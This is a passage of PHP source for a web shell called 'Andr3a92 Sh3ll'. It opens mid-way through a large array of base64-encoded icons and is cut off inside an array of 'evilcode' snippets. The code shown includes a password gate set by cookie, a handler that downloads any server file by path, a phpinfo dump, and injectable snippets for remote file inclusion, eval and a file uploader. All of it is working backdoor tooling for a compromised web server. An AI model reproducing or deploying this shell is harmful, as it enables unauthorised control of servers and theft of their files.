"iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAMZJREFUeNpi/P//PwMlgAWXRFdXFz6Tg8vKytbhNACm2cPDg0FPTw+b/FogxQhiM2HTDNIIA9+/f2f4+vUrw+fPnxk+fPiAYRgTNs1AW7fAxP7+/YuCcYYBzNk7duwAYR9paemXQK44SNO/f/8YYDTeQER2OkizgoICw58/f+CaCRoACjCQX2GKf//+jaIZrxeQ/YysAZ1NtAG4DCLKAFyaiTIAFGi4NJPtBZINwKYZlOmIMgAU9+TmRj9gatxEpD4/GAMgwAAmB/m2aUdLLwAAAABJRU5ErkJggg==", "zip" => "iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAVBJREFUeNqkU7FKxEAQnT3yAf6Bhb2lqJyQL7ERTtDjehEsBGMvgVOuUb8khWIriKWFXQgh5EJCquwzM7uJJoVb3IYwMzvzZt7O7igAtMnybhdHnW5zgVhalS22FTv7PatznNeBz2fH4tjaPaXs/Z60DWS5XD1zrBqDWfe6yuHDE12Gr2Iopej67LAP6omNwBxKN/MptNZomsb4zEFQ1zWqqkJZliiKAnmeI8sypGmKJEkQxzEuTvbg2dS0/lgNmrP+fKQ2sVTT9ihtHdGhzR7TmeDPWaMoEvosXeDWLf4J8zXBIN/3KQgCkS6w2O03oREDXsLABTZNZAbo6XJlXixdYHPNtgecgP8BAydYLosT/NIZMvgfjHETOeD7LZQEXy93bjCZRyVNNAmItg/mkmBnunCCtZ1BdTXb7y6iPwrMFPU6rD4YNPNsldp0nH8EGACCB9wmUHUlHQAAAABJRU5ErkJggg==", "rename" => "iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAYJJREFUeNqUU89LAlEQnn27BMKyNzsmnvYP6FJ3b0XgPei2Ed4M6yheJFaDiPWgB5GIrkHU/9Cha+YmQkpQ2SVEZV3E15uBt2j+SAeGj5l533zzfimcc1jC1oXvCt+w9vfSmChd32UEtBTZoFAoFAVYGMscYigUgmg0CrquQ9nJwnncp9rx7Ro1oQaCzGOxGJimOXcEoRyQnz8ZVD8YPL4xUMPhcFGQN1cho313FXj/UYCJCaxVyVIdt8AWHeIi8sHRKYYttoicsXegux2fpQydTgdT91MTjEYjGA6HQexWv8AztwKy7VxRvl6vI7QnJkBiv9+HwWBAcfrkgfD1pU3ks8sKXS2u6/V6VNNUVS25rmtFIhHwfR88zyOUdlN5IsxelIExBpqmQaPRAMMwSsFjcRyH12o1/teazeZUDtfhevngJl6iGN2SyslkkjCXy9G5SAIqJxKJw2BEWRj3fD5ParZt81n1cZ95jVhA5VQqpfz3y+Y2WIaMpiz5nefarwADACQFMs6fhMd+AAAAAElFTkSuQmCC", "copy" => "iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAUJJREFUeNqckj2Kg1AQxyebrQNWHsBSLCQgiJaiZzEH8A56gBXvYCtoLfZ2KUwsPEM+/HYzj/h2JWogAw/GefN+/5lxNrZtmxzH/cCKnc/ng2VZ7uyl7/vDO3vmwNz5XlI9nU7Uv16vi9VRQJIkNMiyLKRpCnme05jjOMPMe3exAnz86HttNAg1v+BDw/4nLSiKQi+PxyP1oyiivmEY9FtV1dcZILXrOmAYZlFZ13W43+9wu92mAFmWoa5rqKoKsixbLDsIAiKy3+//ABiI4xjatiX+breblD3a5XIBSZKoEAWUZQmCIJAgXhZF8TIDhDdNQwT6vif5BIBrGobhZJX/L46mabRnjKMIQhBIAM8dd2f+8YBJDzhJHg+qo/E8Px3inKGiKIpEHavAVhGw3W4paA3gep5nvtkndzNu1Kf2K8AAAxf9KklDG6EAAAAASUVORK5CYII=", "download" => "iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAZBJREFUeNqckz1LxEAQhmeTNGIjWliJIKKltWCjWAgWWihW1hYHgthb2Fmo1aE2dld5wtlZCFoINv4C/8EVnk0u2a8k7jvJHmejOQeGbDLvM7s7MxFFUdD5Taegf9jxwbYQZ812sbyyTr3PLm2tLtQCH54/aHJqmt5enyjIsoyMsWSNqQVDDy0YrKPMWveinZs/QWi0LrVgwEbIhI/wYcvznIW8oxPCsYZ7PdgImZSCK0JBEcC63MUwiGRwb4iDARtBxB8cmCQJpWlKUkpO5HdFYlgQBBSGIWv9JpHmBJKUg65bL7VbCEZzApdNSkVj4xMjzQAYsJHR5Qm8fbl5+M3iuM/Pmdk5Ajs4AcO9LjX210gIwQ7D/X0NUMgrd81+HA9OEKCSWit2FAZ2enlHt/fvg+rDfft8B6Avu+Aq7UFdtbIUKQbxbnnYypbqKsZdwCDZaro4gXsC8oNiq+R+oIaHiOPoQqd1ITb3Dov5xSVuC6CTo10Wx3xX+WMWdDVg7E4rfGBjpzHyL/3YbopvAQYALTKvvIqUmbwAAAAASUVORK5CYII=", "edit" => "iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAXVJREFUeNpi/P//PwMlgAWbYFdXFz5Tg8vKytbhNACm2cPDg0FPTw+b4WuBFCOMz4SuGaQRBr5//87w9etXhs+fPzN8/PgRLGZtbQ2iGoA4CYjFmNA1A23dAhP7+/cvGP/794+BhQXi2IXTOxnSYvzqgUw5IPZhBAUiup+lpaVf6urqisvLy4P5zMzMDIyMjAyF6ZEMvYG/wGLF69kYZi3Z1AgPA2SnA4G4goIC2GZsmq++YGKwUPgHdgncAFCAgfwK0gTCIKfj0owMUHgwP4O8BdLMxMTEUJQRhaH52nMmhhMPmMBewGoAzGZCmoHcRyzYDODg4GAozoxmaOzyZvgCFH+4fiNWzUC8BcUFf/78gUcbDNy89pLhh7oFXHN8ZjkDTDMQv8LqhV+/IM6uL9sKpm9dfwWzmeHTp08MMM0YSRlmACg2YGDZgjNgurl3Npi+e/cuA0wzhgGguIcBkG3YwLdv37DmRj9gatxEZA72Q+YABBgA8tbVrRni9E4AAAAASUVORK5CYII=", "delete" => "iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAT5JREFUeNqUU0uKhDAQjUOvBBFRXIjgTr2Al+hzeAbPIC5cuBahL9FX8A4uXIgIIohL/5lJoCRmtIcJFFUvqXr18hMwxuhuRFGEi6JAtm2jIAiEq5yvu2Lf9ylzmqYCi/khsAqyLMPbtqF1Xakty0L9PM80BkwsjmPhRPB6vbDneTRpmqbDxnGkBjHxhLAsS5QkifCA7oQoz3MECqAjSWYxKIDGpy2EYYhd1z0kE08MugJZVVXH2ZwOUVVVZJrmgR3HOTpZlkXXFUVBoihe3wJJ3vcdGYZxYF3X6Rxg/tp/EQAJGcSzRTy+VQAJPGZJLglgkdwEq4hX8PElgnyIeUUftwAFrAKY+xcB25H3f26hrmtKIkkS6vuexpqmoa7raPEwDCeSB1v880Debds+m6Y5fSj2CROTZfkNNd8CDABg938S/VLKaAAAAABJRU5ErkJggg==", "chmod" => "iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAATdJREFUeNqUk81Kw0AUhc/ExKYxTaWJFl0oiLh148onER9QxDcQXAuCO8VV8QdXSptFWk3z04x3pjaMtGaSC4E7N/nOnLk3wzjnaBLPl+clcHB2wYymsHfYJ/C0rBnNYJ+ygvLbsm7WhzcRnOxQ/iit13Yg4f0OguOAVvnSe1ML7zoIjroY3n8gehvXFxCwu2Uj2HOBZCZh1fqSgDoeEe2eBadvI0tnsCpcmgvY7mZwtwswg0psnR5qD88xfI0Rh8n/AhLuxNjwYwIs8GLOihC5gFdZ/+PA6Y1ovATjd2NFRBdS4GvkIZl4smB7CR0lVUTWKgXkJwK+vktxdRNiGrUIzsiGEMm1Dkqjg5d3PDwN5gsSECKTT/05mLiN6ghbbkQNjfAd+piO25UNLAVW/QeL66pz8CPAAH98jVpFKupbAAAAAElFTkSuQmCC", "dir" => "iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAABGdBTUEAALGOfPtRkwAAACBjSFJNAAB6JQAAgIMAAPn/AACA6QAAdTAAAOpgAAA6mAAAF2+SX8VGAAABKklEQVR4nGL8//8/AyUAIIBY2vNsYWyoWf8ZQDSUCeKB+IwgSbgYlA1SBxBALDDN2WlxYInff/4xMDMxMvyDKgTR02cvAqllRNcMYgMEEAvM5onTF2A47z+SBrBD0DSDXAYQQCwgTuWkQww/f/7EMODfv38QVwBpbHhitd9/gABigRrN8PEqpgsgBgBpqFf+/fsPZv//BxEDOQcggJhgziFVM1AaLA8QQEz/oYqZmUjTDOYDIUAAMTEghTZJmiGByAAQQEwgU+CaSNAMiWYGBoAAYoJpJF0zOEIZAAKI6T+Sc0jR/B8aiAABBA9EkjUzQBIVQACxMMC8ANUMSsqI2MCtGRboAAEETIn/GXvLPP4jJU+I2dBA+g/LXOgZDZIHGAECiJHS7AwQYAAgis2oJMDmgwAAAABJRU5ErkJggg==", "blank" => "iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAMAAAAoLQ9TAAADAFBMVEX///8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALI7fhAAAAAXRSTlMAQObYZgAAAAlwSFlzAAALEgAACxIB0t1+/AAAAA1JREFUeNpjYBgFyAAAARAAAX/NA7UAAAAASUVORK5CYII=", "refresh" => "iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAABGdBTUEAAK/INwWK6QAAABl0RVh0U29mdHdhcmUAQWRvYmUgSW1hZ2VSZWFkeXHJZTwAAAI/SURBVDjLjZPbS9NhHMYH+zNidtCSQrqwQtY5y2QtT2QGrTZf13TkoYFlzsWa/tzcoR3cSc2xYUlGJfzAaIRltY0N12H5I+jaOxG8De+evhtdOP1hu3hv3sPzPO/z4SsBIPnfuvG8cbBlWiEVO5OUItA0VS8oxi9EdhXo+6yV3V3UGHRvVXHNfNv6zRfNuBZVoiFcB/3LdnQ8U+Gk+bhPVKB3qUOuf6/muaQR/qwDkZ9BRFdCmMr5EPz6BN7lMYylLGgNNaKqt3K0SKDnQ7us690t3rNsxeyvaUz+8OJpzo/QNzd8WTtcaQ7WlBmPvxhx1V2Pg7oDziIBimwwf3qAGWESkVwQ7owNujk1ztvk+cg4NnAUTT4FrrjqUKHdF9jxBfXr1rgjaSk4OlMcLrnOrJ7latxbL1V2lgvlbG9MtMTrMw1r1PImtfyn1n5q47TlBLf90n5NmalMtUdKZoyQMkLKlIGLjMyYhFpmlz3nGEVmFJlRZNaf7pIaEndM24XIjCOzjX9mm2S2JsqdkMYIqbB1j5C6yWzVk7YRFTsGFu7l+4nveExIA9aMCcOJh6DIoMigyOh+o4UryRWQOtIjaJtoziM1FD0mpE4uZcTc72gBaUyYKEI6khgqINXO3saR7kM8IZUVCRDS0Ucf+xFbCReQhr97MZ51wpWxYnhpCD3zOrT4lTisr+AJqVx0Fiiyr4/vhP4VyyMFIUWNqRrV96vWKXKckBoIqWzXYcoPDrUslDJoopuEVEpIB0sR+AuErIiZ6OqMKAAAAABJRU5ErkJggg==", "lock" => "iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAgBJREFUeNp0Ur9v01AQ/p7T2rGDQ0Wabhn4A9iQipBA/ANZok5R/wSYI8VLVMGIEBviD0ikMKGIFYkRFqRKsLAkqIPjhqqJ7VIh2493519pqpz0dGe/+767++4JKSU2bTweS/pvmiaSJAHFdDqdjtjMFZsEBI7juADlh4hc10Wv1xNbCQgcRRHH0+mUPQGJsNVqcex5Hvr9fkGys85GYCIksOM4NyoNh0MZhiGTrJuWB6PRSNLlbDa7BSbrdrvCMAw0Gg0MBgN5i4Au81m3WT7Oek4xAglEBJqmbSWYz+ecI4S4KeKH3lNpm4b6pEsgJuWL9dFv5VGKTfBlcI3jt9/EzmQyOXzw7D4OmvtIJIHS9mTCSETxP0WqcVyslVbqnacatNtt7OomdKOmdLiDqmGrMSrQKhX4wQLOmy/w/QUq2i7Mah2WeRdWbU/5eiHi1zC8RBhcIAz/IAgXWaUEL9995xFevT/l7lYrD8ulmx4V5wSHpmKzLGLdQ826x2ACnrx4zGQnzx/xCLa9D7veVL6JuvJlB6q6H5xzy1SF5ndef4auW0ygGxaTLldu2cGlW27hx6djedBsZIqnIibsZTEOC5uJSIkk4sOjj4LfQXB2jerVVZpI90iyxBSUE5WblPh7EZUP6dfP33CteVEpJZF5mHaG7E1k5qt38ET5/wIMAFY+ZmpX9X6bAAAAAElFTkSuQmCC", "unlock" => "iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAgFJREFUeNqUUkGL01AQ/pLuJk1q6qLbvfUgnr0JK4LiHyhC8VQW+gf0XGhuix5FvIk/oIV60uJV8Lh4EITdi5dWPMRsXbZNshZJ8nwzL3mtlT048JjJ5H3fzHzzDCEENm00GgnKO46DPM9BMZ12u21s3jU2CQicZZkGlYeIgiBAr9czLiUgcJqmHE8mE/YEJMJms8lxGIbo9/uaZGudjcBESGDf9/+qNBgMRJIk9H+5njfLYDgcCqownU7/AZN1Oh3Dsqx3nufdXM/rDmzbBlUgksus2+0+3MxpAhKI2jdNE/9jLOKb3n3hObb8FDBk8xkpr9dHaemhxC5Fj5IlDl5+MrbG4/H+rQc3sNfYRS4IpEYQOSORZr8lqcmxXiutNDxVIrZaLWxbDiy7JnW4gqrtyTEqMCsVRPEM/ouPiKIZKuY2nGodrnMVbm1H+rrewlGSnCOJz6SIPxEns6JSjqevPvMIz15/4e4WixDzeaCOjEuCfUeyuS6x7qDmXmMwAQ+f3GWyw8d3eATP24VXb0jfQF36VQeyehSfcstUheb3n3+AZblMYNkuk84XwaqD82C1heP3B2Kvcb1QXImYsxd6nHIDvAV5SMTbj94a/A7i70tULy7URfqPvLhYrk3ob2UCv87S1UP6evINgftDV1IkogxVZyjeRGFRvMQ96f8IMAB7zVtQdBVN2wAAAABJRU5ErkJggg==", "truncate" => "iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAXpJREFUeNpi/P//PwMlgAWbYFdXFz5Tg8vKytbhNACm2cPDg0FPTw+b4WuBFCOMz4SuGaQRBr5//87w9etXhs+fPzN8+PABq3OY0DUDbd0CE/v79y8YMzExMbCzsyPr8wbiBhDNCApEdD9LS0u/1NXVFZeXl2f49+8f2JDXKXEMmhu2gdQyRF48yfjl6/f/PNycjPAwQHY6EIgrKCgw/PnzB6z5TWo8WPB6gBcDg5UDA0jz6x8/GID4P9wAUICB/AqyEYR///4N1gxi80+bw/AxKwWszvfYAZBGMFtRWJARJRBhfgZhmO0wNueEaXB1ohwcYM0YsYBNMysrKwMfHx/D94IsuM0gAPIGVgPQbQYZ8DwhCq75XWk1mAbx7799/x/FAHTNIBqUFsTmLgbL2+3Yx/DixQtQbDTCwoAF3QWwaIMF5qdPnxi4uLgYNBatAKu5e/cuiDoNNIyRoBdgGGQIyGYksBVrXgDFPbm50Q+YwjYRqccPmQMQYADmggiJk1rTdQAAAABJRU5ErkJggg==", "query" => "iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAlVJREFUeNp8U0trWlEQHq/1LfhWfEXEhYuuSnRjFwrNSiG4LcFVtnbRZbsJXRWyKmRREPIXhGQVMP4ADe4KEhJ8gaL4AJ9R46PfSK54KXRguHPnnPnmm8eRbbdbEqVUKh0tl8vz+Xz+abFYBGGbBUEYKBSKR2heLpdfR6PRBh2ITAQoFotns9nsq16vPzabzWQwGEitVhN8NBgMqNPp0HQ6rWm12kuA/JYAFAqFM2T94XK5Ah6PhzabDbF/vV7TIcNqtUrNZnOKBFeRSOQb++SJROJoMpn8crvd771eL61Wqx0AB/NXtFmZFc6V7Xb7A/6rdrv9j4Baz3U63TFn/l8wn6EnxEnQC123272o1+s2gRtmsVgkl9lm393d3d4ngry+vpLD4aBerxeE71R4eXkJvlGTZGVJpVKUTqclIAxgNBoJDPj/hBmYVSqV5JIIwJLNZsnn80lYYBI0Go04WViQyWQDjEdSwiFAMpmkp6enfWk8FQ7mEcPnewd57Pf7VnRU0jyWTCZDsVhsP072o4E7+lw2/HUGyLdarY8McDgBziqCicogSqWSGo0GWa1W9j1gU4Xr4XBYq1QqBPufaRzaWGd6fn4mNJ7eGN8L8Xi8odFoLjHTKYOA0Q6IRczKtLnRfF6r1cjv9/O9G5zf7t9CLpf7iX3/gos6p9NJJpOJsGA0Ho93NTNtTIwCgQBhlYuI+x4KhfKyw13Hm/iMh3PBSwLddRvsOIBsNtuONsq4QcxVOBzOS16jKOVy2QZqp9ATnIXx9UHrsB+g99BbBHfF+38FGACEB/w/R/hNqQAAAABJRU5ErkJggg==", "logout" => "iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAACPklEQVR42mNkoBAwni43+k+sYtPOc4xYDWARlWL4+O3nfdfG3Rkgwd9/GT4BqW9Q/AWIPwLVfcNqwKkyw//f/jExaNi5MNx+8+uAU2p/OzYDfHqEvm3hfcfAkM6AYghjd1naf+NfJxmkJQQYRM29GFYsXnYga97FShQDpjD0MLAyRIN1oBtwosTg/5df/xikRLgYuOU0GdqmbWaYeeqNJdyAFgZvBlGGCW3mLQxVJ2swA/FYkT7YAEmgAbwKugzt0zYgDKhm8GSQY+hoMmtg+PT7I8Off78ZeFi5GdiY2Rne/HzFMGnVDAbGwwW6EAOEORm4ZTQYeubuQBgwk+Fig2kdw7FXRxi+/vnCwMnCwcABxNysXAzinGIMk1bOYmA8mKvz//PPv2ADOCSUGCYtPYDhgmj1cIYvfz4z8LPzMXAAbedgYWfgZ+NnaF7czcC4L0vr/0eQAYIcDOeYtBkevvzC0LlwE0YYFBhkM0xYNRUzDDqKU/4rvT7AIAE04Ol/EYbdd34yzNt23BJrLNwC8nrRYmF7iur/91//MIgDDWDlFWJYvO8Gw+zTb1ENAKYDl1a+b3vefcI0YHOC8v+3X34ziAuwM7By8TKsO/WIYdqJNxgGANV9811wFzMlgoj5QTKXhXhYdZjZOBh2Xn3DMPn4a31QigbiX0j0Wygb04A5ATJKPBzMZznZWQQO3v3M0HfklQtU8R8gfgPEj4D4B9bcCGMsDJYN4GRjXn/++XeG9gMvI6DOvwLE9/HlUABUQ/ZxJnFQUAAAAABJRU5ErkJggg==", "favicon1" => "AAABAAEAEBAAAAEAIABoBAAAFgAAACgAAAAQAAAAIAAAAAEAIAAAAAAAAAAAABELAAARCwAAAAAAAAAAAAAEAAAnAAAAIgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAWQcHeTQSEtABAABJAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAG0BAQpjDAyCQBUT4QQkAqccGQRwajoQjEcoBYkAAAA9AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB42EZgopEf/No4t/9+zd//xsHL/klkb2gYAAFYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAzRwc9L6U5+hCuQf87lj7/6MKa//O1eP+TXCHcDgQAVAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA1HoYI8+xe/pNt23/NZg9/+LAmf/twZr/9seX/6pvMOgbCwBsAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAO6HFhPwuH3f+PPv/+zXvf/sx6L/7cqo/+/Stf/2yp//vX898ysWAIUAAAATAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA540VWO3Gn//24c//89vD//Tgy//w07f/7cyr//TKn//NikL6NxoAnQAAACsAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADhjSpZ676K7/Ti0P/jq3b/68Wg/+/Ttf/rxqD/7b6P/9eQUf9VLwepAAAABwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOqHGjLejjnM5riS//DStv/pvJD/6sKc/+i+kv/ruIn/sXE/8h4IAHcAAAARAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA6pQhFuemO6Xfomz/5bGA/+vFoP/ou47/6LqO/8KFXf+AMgn4EAYAXwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADypw4K4pdErevLrP/rxqT/6cCX/+a7kv/DbyH/tVIG/z4XAIQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOWNKhjenVHI6b6Q/+nDmf/hpGH/34wt/89zHv8qDwBXAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA55cqBsV5I0TSciXD77Jq//OtZP6FQxCmAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA2TEAB6xaCVZXKQVDBgEAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA//8AAL//hv+J/8jpwP/67uB/1uXgP6TS4A+L0vAHbsz4A4zh/AOO//4BAAL/AAAA/4EAAP/hAAD//wAA//8AAA==", "favicon2" => "AAABAAEAEBAAAAEAIABoBAAAFgAAACgAAAAQAAAAIAAAAAEAIAAAAAAAAAAAAPAKAADwCgAAAAAAAAAAAAAAAAAAAAAAAAAAACMFAwM/AQEBNwAAABkAAAADAAAABwAAAAMCAQEgCAUFSwYEBEMAAAAxAAAAHAAAAAIAAAAAAAAAAGhNTW6cdnbflGdn7ophYedxTk7SY0dHs4JjY7pjRka1l25u3LqLi/eZbW3uoXl55INhYdUQCgpZAAAAAAAAAADYrq7i/+/v//LR0f/iubn/4rOz//7R0f//3Nz//9DQ/+y3t//hra3/77q6//3Hx//nsLD/NSQkegAAAAAAAAAAz6ioqv/y8v//8PD//+np//fT0//92dn//9vb///W1v/8zMz/9cLC//fExP/3w8P/vpCQ8QkGBjkAAAAAAAAAAMyiol799vb///b2///x8f/22tr/+tzc///j4///29v//tPT//fFxf/5xsb//MjI/5Nubs0AAAAQAAAAAAAAAADasLAr7d7e+v///////Pz/++vr//rj4///6ur//+Li///a2v/6zc3//svL//vFxf9kSUmrAAAAAAAAAAAAAAAA04uLBuLCwtH///////////329v/66+v///Ly///q6v//4OD//NPT///R0f/yvr7/QzAwgwAAAAAAAAAAAAAAAAAAAADcuLiU/////////////f3//fX1///6+v/+7u7//+fn//7a2v//19f/4rGx/yQZGWIAAAAAAAAAAAAAAAAAAAAAln5+dv/+/v/Uu7v/7dra///////XxMT/06+v//3m5v//4+P//9vb/9apqf4MCQlTAAAAAAAAAAAAAAAAAAAAAN21tWfs5eX/pISE/8qsrP/y7Oz/ooeH/7CMjP/hxcX//+rq///f3//LoKDwBgMDPQAAAAAAAAAAAAAAAAAAAADvsrJS4tnZ/4VwcP+hior/5Nra/4Nvb/+NcnL/xK2t///v7///4+P/tJCQ3gEAAB8AAAAAAAAAAAAAAAAAAAAA94SEMu7a2v5zY2P/e25u//Dn5/96aGj/X1BQ/8u8vP//8fH//+Tk/4NlZbMAAAAEAAAAAAAAAAAAAAAAAAAAAP/5+Qn/5ubOybq6/7yysv//////w7Cw/5iKiv/78fH///Hx/+vGxvsmGhpLAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAn4ODTv/29v///////////////////v7///r6///r6/95X1+UAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD4xMRo9+Tk8f////////////////Te3viGaWmJBQICCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAPK3tye9nJxke3R0fXhoaHVQODg0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA//8AAMADhv+AA8jpgAP67sAD1uXAA6TSwAOL0sAHbszgB4zh4AeO/+AHAALgBwAA4A8AAPAPAAD4HwAA//8AAA==" ); header("Content-type: image/gif"); header("Cache-control: public"); echo base64_decode($images[$img]); die(); } if(is_file(md5('andr3a92'))){ if(!isset($_COOKIE['shell_username']) || !isset($_COOKIE['shell_password'])){ if(!isset($_POST['login'])){ echo '
Username:
Password:
'; die(); } else{ $fp = file(md5('andr3a92')); $fp = explode('::::',$fp[count($fp)-2]); $username = trim($fp[0]); $password = trim($fp[1]); if(md5(md5(strtolower($_POST['username'])).'andr3a92') == $username && md5(md5($_POST['password']).'andr3a92') == $password){ setcookie('shell_username',md5(sha1(md5(sha1(md5(sha1(base64_encode($username))))))),time() + 60*60*24,"/"); setcookie('shell_password',md5(sha1(md5(sha1(md5(sha1(base64_encode($password))))))),time() + 60*60*24,"/"); } else{ echo 'USERNAME AND/OR PASSWORD WRONG!'; die(); } } } else{ $fp = file(md5('andr3a92')); $fp = explode('::::',$fp[count($fp)-2]); $username = trim($fp[0]); $password = trim($fp[1]); if(($_COOKIE['shell_username'] != md5(sha1(md5(sha1(md5(sha1(base64_encode($username)))))))) || ($_COOKIE['shell_password'] != md5(sha1(md5(sha1(md5(sha1(base64_encode($password))))))))){ setcookie("shell_username","",time() - 3600,"/"); setcookie("shell_password","",time() - 3600,"/"); header("refresh: 1"); die('Access denied!'); } } } if($_POST['download'] != ""){ $download = $_POST['download']; if(strpos($download,"/") !== FALSE){ $download_name = explode("/",$download); $download_name = $download_name[count($download_name)-1]; } elseif(strpos($download,"\\") !== FALSE){ $download_name = explode("\\",$download); $download_name = $download_name[count($download_name)-1]; } else $file_name = $download; if(is_file($download)) download($download); else die("404 not found!"); } if($_POST['phpinfo'] == "view"){ echo "
Return to Andr3a92 Sh3ll


"; phpinfo(); die(); } ?> "> ~ Andr3a92 ~ Sh3ll ~
'', "eval_remote_file" => '', "eval" => '', "uploader" => '
File: \'; } else{ $temporaney = $_FILES[\'file\'][\'tmp_name\']; $upload = $_FILES[\'file\'][\'name\']; if(move_uploaded_file($temporaney,$upload)) echo \'File uppato!\'; else echo \'File non uppato!\'; }}?>' ); $evilcode_base64 = array( "rfi" => '', "eval_remote_file" => '', "eval" => '', "uploader" => '' ); } else{ $evilcode = array( "rfi" => '', "eval_remote_file" => '', "eval" => '', "uploader" => '
